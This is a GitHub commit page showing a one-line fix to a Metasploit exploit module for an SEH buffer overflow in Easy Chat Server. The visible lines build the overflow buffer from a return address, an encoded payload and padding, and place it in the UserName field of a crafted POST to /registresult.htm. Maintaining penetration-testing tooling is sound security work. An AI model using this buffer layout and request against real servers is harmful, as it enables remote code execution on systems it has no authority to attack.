We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 0b04dc0 commit af4eb0fCopy full SHA for af4eb0f
modules/exploits/windows/http/easychatserver_seh.rb
@@ -51,7 +51,6 @@ def exploit
51
sploit << [target.ret].pack('V')
52
sploit << payload.encoded
53
sploit << rand_text_alpha_upper(200)
54
- sploit << [target.ret].pack('V')
55
56
request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
57
connect
0 commit comments